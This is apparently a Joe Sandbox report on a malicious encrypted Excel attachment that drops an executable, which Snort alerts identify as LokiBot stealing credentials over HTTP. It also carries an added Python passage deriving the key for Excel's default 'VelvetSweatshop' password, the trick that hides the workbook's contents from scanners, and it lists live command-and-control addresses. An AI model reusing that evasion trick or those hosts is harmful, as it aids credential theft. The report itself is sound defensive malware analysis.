                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                Process:C:\Users\Public\vbc.exe
                File Type:data
                Category:dropped
                Size (bytes):46
                Entropy (8bit):1.0424600748477153
                Encrypted:false
                SSDEEP:3:/lbWwWl:sZ
                MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                Malicious:false
                Preview: ........................................user.
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\132SWST2.txt
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:ASCII text
                Category:downloaded
                Size (bytes):109
                Entropy (8bit):4.249081127682951
                Encrypted:false
                SSDEEP:3:GmM/U04EDzcpGGXUTUWQPC+KvjNf5jXcW6HOjSjXv:XM/UdEDwwGXUYXP6jfrnQOj2v
                MD5:9E9CCD2E7A37630AF52D8B1889355BDA
                SHA1:67D65974597F7AE414EF74B0D8B913F5071EF0F6
                SHA-256:768E6CE61429EBFD9DE25B66E85AA8BBB9E55B898B04E2581C72EF0941FFB604
                SHA-512:B960216C9A88615A7C7051441A7D5A799FB35E404539D49131E40580B959523C877E059DD9ADB2F239B665C67BA077DAE8B75E295867A35F1BE37866204B84F1
                Malicious:false
                IE Cache URL:cutt.ly/
                Preview: __cfduid.d87db188c203ff618989dc45e3896bc351613455365.cutt.ly/.9728.1351479424.30874556.2930565278.30868597.*.
                C:\Users\user\Desktop\~$MV FORTUNE TRADER.xlsx
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:false
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\Public\vbc.exe
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:modified
                Size (bytes):269312
                Entropy (8bit):6.728521643538962
                Encrypted:false
                SSDEEP:6144:T1wUIRkrbJzmFuERDOm+dwclg+8Iy+8Cl9Tf6BxUemJ:T1ORkr1CFuERD9+yb+R8k9TS79mJ
                MD5:2559B5B8D60DD663DF52D0570F5973A9
                SHA1:2AF0E521C34CF7EAAE8677E593900024FE0D16C9
                SHA-256:77EFE5A35F94F065B20860F7E446432D9C61FD6B139B1F4CD360A5A728F49410
                SHA-512:EAFD4ADD02278EE7C827A8EE21827D47ADCAFCA0D29F1CFAC2DE5DC6DDD734BA4C3B74A50DA6C977AF84DEC72498EE4642DA6328459AC659CA84C8CD5F69E669
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 36%
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.f...5...5...5.HP5...5.HA5...5.HF5...5..5...5...5...5.HO5...5.HW5...5.HQ5...5.HT5...5Rich...5........................PE..L....A.]............................@0............@.................................m0.............................. ...b...`}..<........v...........................................................................................................text...q........................... ..`.rdata..............................@..@.data....t.......(...|..............@....rsrc....v.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:CDFV2 Encrypted
                Entropy (8bit):7.996808233126403
                TrID:
                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                File name:MV FORTUNE TRADER.xlsx
                File size:2551296
                MD5:b9d2e20a706f5dccd80cbfca09685732
                SHA1:b3d2b8eaa620398c83ff203c3c705d03dad55288
                SHA256:132f5ce3c879259992351ae90865928ed508f5a76ab3f97ce6cd624ecccb551d
                SHA512:4c03476532bf33d64c42c9d2758ec1b55812869881586d83bd76b7f0887c2333cf0e71867fbe87cedaa6d985cc448612ce4e3df0a2a8dad177f5afe94faae66a
                SSDEEP:49152:U86IUlgkJPS53DdEjy8pZ9yrxkhhLIz1Q/1GxtK2qDW0Gq7FrdiiTRWuDchrj:510PSvGyIZUr6hxK1QMG2oW0rBicUB
                File Content Preview:........................>...................'...........................................................................................~...............z.......|.......~...............z.......|.......~...............z.......|..............................

                File Icon

                Icon Hash:e4e2aa8aa4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "MV FORTUNE TRADER.xlsx"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:False

                Streams

                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                General
                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                File Type:data
                Stream Size:64
                Entropy:2.73637206947
                Base64 Encoded:False
                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                General
                Stream Path:\x6DataSpaces/DataSpaceMap
                File Type:data
                Stream Size:112
                Entropy:2.7597816111
                Base64 Encoded:False
                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                General
                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                File Type:data
                Stream Size:200
                Entropy:3.13335930328
                Base64 Encoded:False
                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                General
                Stream Path:\x6DataSpaces/Version
                File Type:data
                Stream Size:76
                Entropy:2.79079600998
                Base64 Encoded:False
                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                Stream Path: EncryptedPackage, File Type: data, Stream Size: 2527480
                General
                Stream Path:EncryptedPackage
                File Type:data
                Stream Size:2527480
                Entropy:7.99992623739
                Base64 Encoded:True
                Data ASCII:. . & . . . . . . ~ . . q g . . ' . . 7 . . . . . . . ! . . . 4 . . Y E . . . . 9 [ z _ . U . . . B . . . . 3 . . a . : . . . . h . . . ~ " . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . . . . . . . . . . 7 ! . . . . . .
                Data Raw:e3 90 26 00 00 00 00 00 ab 7e 8b c3 71 67 c2 1d 27 fc e0 37 99 fd fa 1e 01 cf 04 21 2e 11 c0 34 ca b9 59 45 bc e4 11 1a 39 5b 7a 5f 84 55 fe f9 fb 42 9f 01 8a 2e 33 ad 94 61 ad 3a d8 a2 cc 0f 68 e5 c2 d2 7e 22 19 14 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7 85 94 83 af 10 1c 1a 09 37 21 9b fe 8e 92 ff c7
                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                General
                Stream Path:EncryptionInfo
                File Type:data
                Stream Size:224
                Entropy:4.55378508921
                Base64 Encoded:False
                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . V v . Y A . _ . l . 8 . . . ] . Q . . . . . % . > . . z / . . . . . . . l . . . . . . ' . . . E . . . J m . . . R . . b . . ? . . . .
                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00 (EncryptionVersionInfo 4.2 = Standard encryption; flags 0x24 = fCryptoAPI|fAES; header size 0x8c; AlgID 0x660E = CALG_AES_128; AlgIDHash 0x8004 = CALG_SHA1; KeySize 128; ProviderType 0x18 = PROV_RSA_AES; CSPName follows)
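The stream dump above explains why the static view of this sample is empty (no workbook stream, no VBA, "Encrypted Document: True"): the container is a CDFV2 compound file whose only payload is the EncryptedPackage stream (entropy 7.9999), and the EncryptionInfo header declares Standard ECMA-376 encryption with AES-128, SHA-1 and the Microsoft Enhanced RSA and AES provider, so the OOXML package (worksheets, embedded OLE objects, any VBA) is invisible until it is decrypted. Excel silently tries the fixed password "VelvetSweatshop" before prompting, so a workbook encrypted with it opens like an unprotected one while most scanners never see the inside. The script below is an added example, not code from the report or from Joe Sandbox: it decodes the header bytes printed above (the Data Raw column stops inside the CSPName, which is completed from the Data ASCII column), reads the plaintext length from the first eight bytes of EncryptedPackage, and runs the MS-OFFCRYPTO 2.3.4.7 key derivation for the default password. The 16-byte salt is a constructed placeholder: the remaining 72 bytes of the 224-byte stream (the EncryptionVerifier, holding the real salt and the encrypted verifier pair) are not printed, so the derived key cannot be checked against the real file here.

```python
"""Added example (not from the report or Joe Sandbox): parse the Standard
ECMA-376 EncryptionInfo header printed above and derive the document key the
way Excel does for its built-in default password "VelvetSweatshop".

Header bytes are the ones the report prints; its Data Raw stops inside the
CSPName, which is completed from the Data ASCII column. SALT is CONSTRUCTED,
because the report truncates the stream before the EncryptionVerifier.
"""
import hashlib
import struct

# EncryptionVersionInfo + flags + header size, then the 140-byte EncryptionHeader.
ENCRYPTION_INFO_HEAD = bytes.fromhex(
    "04000200"   # vMajor=4, vMinor=2: Standard encryption (Agile would be 4.4)
    "24000000"   # EncryptionInfo flags: fCryptoAPI | fAES
    "8c000000"   # EncryptionHeaderSize = 140
    "24000000"   # EncryptionHeader.Flags
    "00000000"   # SizeExtra
    "0e660000"   # AlgID        = CALG_AES_128
    "04800000"   # AlgIDHash    = CALG_SHA1
    "80000000"   # KeySize      = 128 bits
    "18000000"   # ProviderType = PROV_RSA_AES
    "00000000"   # Reserved1
    "00000000"   # Reserved2
) + "Microsoft Enhanced RSA and AES Cryptographic Provider\0".encode("utf-16-le")

# First 8 bytes of the EncryptedPackage stream as printed in the report.
ENCRYPTED_PACKAGE_PREFIX = bytes.fromhex("e390260000000000")
ENCRYPTED_PACKAGE_STREAM_SIZE = 2527480

CALG_AES_128 = 0x660E
CALG_SHA1 = 0x8004
FLAG_CRYPTOAPI = 0x04
FLAG_AES = 0x20
DEFAULT_PASSWORD = "VelvetSweatshop"  # tried silently by Excel before prompting
SPIN_COUNT = 50000                    # fixed for Standard encryption


def parse_encryption_info(data: bytes) -> dict:
    """Decode the fixed part of a Standard-encryption EncryptionInfo stream."""
    vmajor, vminor, flags, hdr_size = struct.unpack_from("<HHII", data, 0)
    if vminor != 2 or vmajor not in (2, 3, 4):
        raise ValueError(f"not Standard encryption: version {vmajor}.{vminor}")
    hdr = data[12:12 + hdr_size]
    (h_flags, _size_extra, alg_id, alg_id_hash, key_size,
     provider_type, _r1, _r2) = struct.unpack_from("<8I", hdr, 0)
    return {
        "version": (vmajor, vminor),
        "flags": flags,
        "aes": bool(h_flags & FLAG_AES),
        "cryptoapi": bool(h_flags & FLAG_CRYPTOAPI),
        "alg_id": alg_id,
        "alg_id_hash": alg_id_hash,
        "key_size": key_size,
        "provider_type": provider_type,
        "csp_name": hdr[32:].decode("utf-16-le").rstrip("\0"),
    }


def encrypted_package_plaintext_size(stream_head: bytes) -> int:
    """EncryptedPackage starts with a little-endian uint64: the length of the
    decrypted OOXML package. The ciphertext after it is padded to 16 bytes."""
    return struct.unpack_from("<Q", stream_head, 0)[0]


def derive_key(password: str, salt: bytes, key_size_bits: int, block: int = 0) -> bytes:
    """MS-OFFCRYPTO 2.3.4.7 key derivation for Standard encryption (SHA-1)."""
    h = hashlib.sha1(salt + password.encode("utf-16-le")).digest()
    for i in range(SPIN_COUNT):                 # H_n = H(LE32(n) || H_{n-1})
        h = hashlib.sha1(struct.pack("<I", i) + h).digest()
    h_final = hashlib.sha1(h + struct.pack("<I", block)).digest()
    halves = []
    for pad in (0x36, 0x5C):                    # ipad/opad-style expansion of H_final
        buf = bytearray([pad] * 64)
        for i, b in enumerate(h_final):
            buf[i] ^= b
        halves.append(hashlib.sha1(buf).digest())
    return (halves[0] + halves[1])[: key_size_bits // 8]


def default_password_key(data: bytes, salt: bytes) -> tuple:
    """Parse the header and return (info, AES key for VelvetSweatshop)."""
    info = parse_encryption_info(data)
    if not (info["aes"] and info["alg_id"] == CALG_AES_128 and info["alg_id_hash"] == CALG_SHA1):
        raise ValueError("unexpected cipher suite; this derivation assumes AES-128/SHA-1")
    return info, derive_key(DEFAULT_PASSWORD, salt, info["key_size"])


if __name__ == "__main__":
    SALT = bytes(range(16))  # CONSTRUCTED stand-in for the salt in EncryptionVerifier
    info, key = default_password_key(ENCRYPTION_INFO_HEAD, SALT)
    for k, v in info.items():
        print(f"{k:>14}: {hex(v) if isinstance(v, int) and not isinstance(v, bool) else v}")
    print("plaintext package bytes:", encrypted_package_plaintext_size(ENCRYPTED_PACKAGE_PREFIX))
    print(f"AES-128 key for {DEFAULT_PASSWORD!r}: {key.hex()}")
```

The size check is a useful sanity test on any such sample: 0x2690E3 = 2,527,459 plaintext bytes, and the stream's remaining 2,527,472 bytes are exactly that length rounded up to the AES block size. To actually confirm the password you need the salt and the verifier pair from the stream: decrypt EncryptedVerifier and EncryptedVerifierHash with the derived key in AES-128-ECB and compare SHA-1 of the former with the first 20 bytes of the latter, which is what tools such as msoffcrypto-tool do before decrypting the package.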

                Network Behavior

                Snort IDS Alerts

                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                02/16/21-07:02:51.005730 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49168 | 80 | 192.168.2.22 | 185.208.180.121
                02/16/21-07:02:51.005730 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49168 | 80 | 192.168.2.22 | 185.208.180.121
                02/16/21-07:02:51.005730 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49168 | 80 | 192.168.2.22 | 185.208.180.121
                02/16/21-07:02:51.005730 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49168 | 80 | 192.168.2.22 | 185.208.180.121

                Network Port Distribution

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Feb 16, 2021 07:02:44.529942036 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:44.583849907 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:44.583988905 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:44.598814964 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:44.652445078 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:44.655513048 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:44.655586958 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:44.655622959 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:44.655729055 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:44.655764103 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:44.655770063 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:44.674331903 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:44.725692034 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:44.725754023 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:44.725884914 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:45.944720984 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:45.997760057 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:46.129453897 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:46.129514933 CET | 443 | 49165 | 172.67.8.238 | 192.168.2.22
                Feb 16, 2021 07:02:46.129683971 CET | 49165 | 443 | 192.168.2.22 | 172.67.8.238
                Feb 16, 2021 07:02:46.237684011 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.459585905 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.459723949 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.460187912 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.682566881 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.682643890 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.682668924 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.682698011 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.682719946 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.682761908 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.682775974 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.682812929 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.906913042 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.906970978 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.907004118 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.907010078 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.907036066 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.907052994 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.907059908 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.907109976 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.907182932 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.907222986 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.907232046 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.907260895 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.907275915 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.907299995 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:46.907318115 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:46.907351971 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.128703117 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.128797054 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.128814936 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.128860950 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.128907919 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.128930092 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.128952026 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.128979921 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129039049 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129070044 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129111052 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129133940 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129163980 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129260063 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129322052 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129422903 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129472017 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129489899 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129533052 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129543066 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129602909 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129694939 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129760027 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129790068 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129877090 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.129913092 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.129980087 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.130073071 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.130115986 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.130135059 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.130178928 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.130836964 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.350758076 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.350816965 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.350857019 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.350898981 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.350948095 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.350991964 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.351028919 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.351043940 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.351068974 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.351069927 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.351074934 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.351093054 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.351102114 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.351144075 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
                Feb 16, 2021 07:02:47.351149082 CET | 80 | 49167 | 103.141.138.123 | 192.168.2.22
                Feb 16, 2021 07:02:47.351165056 CET | 49167 | 80 | 192.168.2.22 | 103.141.138.123
